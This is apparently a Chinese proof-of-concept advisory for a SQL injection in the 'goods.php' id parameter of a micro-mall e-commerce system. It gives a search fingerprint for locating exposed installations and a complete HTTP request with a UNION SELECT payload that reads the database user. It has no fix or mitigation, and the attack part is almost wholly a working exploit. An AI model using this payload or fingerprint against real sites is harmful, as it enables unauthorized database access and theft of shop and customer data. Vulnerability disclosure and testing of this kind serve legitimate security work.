微商城系统goods存在SQL注入漏洞
一、漏洞简介
微商城系统有优选,超值捡漏功能,人气销量,以及商家推荐功能,还有订单查询,智能客服等功能,微商城系统goods存在SQL注入漏洞。
二、影响版本
- 微商城系统
三、资产测绘
"Location: https://m.baidu.com" && domain!="baidu.com"
四、漏洞复现
GET /goods.php?id='+UNION+ALL+SELECT+NULL,NULL,NULL,CONCAT(IFNULL(CAST(CURRENT_USER()+AS+NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=2t6mrecrn4kesrguck8o1c1ohp
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close